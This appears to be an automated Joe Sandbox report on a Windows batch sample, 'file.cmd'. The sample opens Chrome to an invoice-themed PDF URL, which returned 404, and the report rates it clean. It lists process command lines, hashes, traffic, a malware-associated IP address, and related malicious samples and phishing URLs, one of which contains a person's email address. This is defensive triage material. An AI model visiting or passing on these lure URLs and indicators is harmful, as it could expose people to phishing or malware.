Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.cmd

Overview

General Information

Sample name:file.cmd
Analysis ID:1446784
MD5:21737449c6f74e5e1189d703b6591d0f
SHA1:b09e319ed020ba959a1eee66897dfdd17d66b2d0
SHA256:8604af0ca2b410192af9b078386dceede67ffddc7a467fb4bec39173e69f94bd
Tags:cmd
Infos:

Detection

Score:3
Range:0 - 100
Whitelisted:false
Confidence:60%

Signatures

Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Stores files to the Windows start menu directory
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w10x64
  • cmd.exe (PID: 7276 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 7304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7348 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.cmd" MY_FLAG MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chrome.exe (PID: 7500 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
        • chrome.exe (PID: 7696 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,14738724468335102062,7754338843543299743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

There are no malicious signatures, click here to show all signatures.

Source: https://s2r.tn/cgi/INVOICERVSHA.pdfHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49721 version: TLS 1.0
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 70.38.21.234 70.38.21.234
Source: Joe Sandbox ViewIP Address: 239.255.255.250 239.255.255.250
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: unknownHTTPS traffic detected: 23.206.229.209:443 -> 192.168.2.9:49721 version: TLS 1.0
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 2.19.85.159
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.11
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 20.114.59.183
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: unknownTCP traffic detected without corresponding DNS query: 23.206.229.209
Source: global trafficHTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: s2r.tnConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://s2r.tn/cgi/INVOICERVSHA.pdfAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cgi/INVOICERVSHA.pdf HTTP/1.1Host: s2r.tnConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BCBY8ZxyE7AZX3U&MD=h1X+NoXU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=BCBY8ZxyE7AZX3U&MD=h1X+NoXU HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficDNS traffic detected: DNS query: s2r.tn
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:07:29 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:07:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 23 May 2024 19:07:30 GMTServer: ApacheContent-Length: 315Connection: closeContent-Type: text/html; charset=iso-8859-1
Source: file.cmdString found in binary or memory: https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.9:49717 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.19.85.159:443 -> 192.168.2.9:49718 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49719 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.9:49722 version: TLS 1.2
Source: classification engineClassification label: clean3.winCMD@20/10@6/5
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7304:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\file.cmd" "
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.cmd" MY_FLAG
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdf
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,14738724468335102062,7754338843543299743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.cmd" MY_FLAG Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdfJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1996,i,14738724468335102062,7754338843543299743,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: ieframe.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: netapi32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wininet.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
Source: Google Drive.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.6.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\file.cmd" MY_FLAG Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://s2r.tn/cgi/INVOICERVSHA.pdfJump to behavior
Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
DLL Side-Loading
11
Process Injection
1
Masquerading
OS Credential Dumping1
System Information Discovery
Remote ServicesData from Local System1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/Job1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
11
Process Injection
LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media3
Non-Application Layer Protocol
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive4
Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
Ingress Tool Transfer
Traffic DuplicationData Destruction
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1446784 Sample: file.cmd Startdate: 23/05/2024 Architecture: WINDOWS Score: 3 7 cmd.exe 1 2->7         started        process3 9 cmd.exe 13 7->9         started        11 conhost.exe 7->11         started        process4 13 chrome.exe 14 9->13         started        16 conhost.exe 9->16         started        dnsIp5 25 192.168.2.11 unknown unknown 13->25 27 192.168.2.9, 138, 443, 49704 unknown unknown 13->27 29 239.255.255.250 unknown Reserved 13->29 18 chrome.exe 13->18         started        process6 dnsIp7 21 s2r.tn 70.38.21.234, 443, 49711, 49712 IWEB-ASCA Canada 18->21 23 www.google.com 142.250.181.228, 443, 49716, 49724 GOOGLEUS United States 18->23

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.cmd0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://s2r.tn/favicon.ico0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
s2r.tn
70.38.21.234
truefalse
    unknown
    www.google.com
    142.250.181.228
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://s2r.tn/cgi/INVOICERVSHA.pdffalse
        unknown
        https://s2r.tn/favicon.icofalse
        • Avira URL Cloud: safe
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        70.38.21.234
        s2r.tnCanada
        32613IWEB-ASCAfalse
        239.255.255.250
        unknownReserved
        unknownunknownfalse
        142.250.181.228
        www.google.comUnited States
        15169GOOGLEUSfalse
        IP
        192.168.2.11
        192.168.2.9
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1446784
        Start date and time:2024-05-23 21:06:31 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 19s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:15
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:file.cmd
        Detection:CLEAN
        Classification:clean3.winCMD@20/10@6/5
        EGA Information:Failed
        HCA Information:
        • Successful, ratio: 100%
        • Number of executed functions: 0
        • Number of non-executed functions: 0
        Cookbook Comments:
        • Found application associated with file extension: .cmd
        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 142.250.186.67, 172.217.18.110, 64.233.166.84, 34.104.35.123, 192.229.221.95, 142.250.185.99, 216.58.212.174
        • Excluded domains from analysis (whitelisted): clients1.google.com, fs.microsoft.com, clients2.google.com, ocsp.digicert.com, accounts.google.com, edgedl.me.gvt1.com, slscr.update.microsoft.com, update.googleapis.com, clientservices.googleapis.com, clients.l.google.com, fe3cr.delivery.mp.microsoft.com
        • Not all processes where analyzed, report is missing behavior information
        • VT rate limit hit for: file.cmd
        No simulations
        InputOutput
        URL: https://s2r.tn/cgi/INVOICERVSHA.pdf Model: Perplexity: mixtral-8x7b-instruct
        {
        "loginform": false,
        "reasons": [
        "The text 'Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.' does not indicate the presence of a login form.",
        "The text suggests that the requested URL is not found, which is not related to a login form."
        ]
        }
        Not Found The requested URL was not found on this server. Additionally: a 404 Not Found error was encountered while trying to use an ErrorDument to handle the request. 
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        70.38.21.234filePY.cmdGet hashmaliciousUnknownBrowse
          file py p.batGet hashmaliciousUnknownBrowse
            file py portable.batGet hashmaliciousUnknownBrowse
              fileEEE.batGet hashmaliciousUnknownBrowse
                https://greenwoodpark.com.au/hvilkes-receipt.zipGet hashmaliciousUnknownBrowse
                  https://opodo.onelink.me/RnQA?pid=CRM&af_adset=email&af_ad=crm_nl_PDA_SneakPeek_NP_X_290124__&is_retargeting=true&af_dp=op-app%3A%2F%2Flaunch%2F%3futm_content%3dUL_hero%26utm_source%3dsf%26utm_medium%3dcrm%26utm_campaign%3dnl%26utm_term%3dXX-XX-CRM-E-NL-PDA-FL-X-NP_PrimeDay8_NonPrime_SneakPeekAPP_290124_Render_435150%26mktportal%3dNL&af_web_dp=https://tunisianrentcar.tn/jo0eue/9761/new/new/dvader@hinckleyallen.com##Get hashmaliciousUnknownBrowse
                    upload.vbsGet hashmaliciousVenomRATBrowse
                      update.vbsGet hashmaliciousXWormBrowse
                        windows.vbsGet hashmaliciousXWormBrowse
                          file.batGet hashmaliciousUnknownBrowse
                            239.255.255.250new.cmdGet hashmaliciousGuLoaderBrowse
                              filePY.cmdGet hashmaliciousUnknownBrowse
                                http://hxjmm.check-tl-ver-154-2.comGet hashmaliciousUnknownBrowse
                                  https://gheenirrigation.zendesk.com/api/v2/channels/voice/calls/CA22db3177fb7a310b9b6e136c494a58df/twilio/voicemail/recordingGet hashmaliciousUnknownBrowse
                                    https://t.co/PmbTTSQ6z4Get hashmaliciousUnknownBrowse
                                      b23c466-Payment Reciept May 22 2024.htmlGet hashmaliciousUnknownBrowse
                                        https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                          https://freexxxth.linkGet hashmaliciousUnknownBrowse
                                            https://www.flipsnack.com/C65D7DCC5A8/sw-bruce-limited/full-view.htmlGet hashmaliciousUnknownBrowse
                                              https://www.whtenvlpe.com/acTcl2kTmPSJi_Ld_mhpL5dNumT258E0ztzYJGo7sYTHmy1SnIHoHTr_lyuA2BZnhF49nvpBtTPseiLflrqOEA~~/16/1Get hashmaliciousUnknownBrowse
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                s2r.tnfilePY.cmdGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py p.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                file py portable.batGet hashmaliciousUnknownBrowse
                                                • 70.38.21.234
                                                fileEEE.batGet hashmaliciousUnknownBrowse
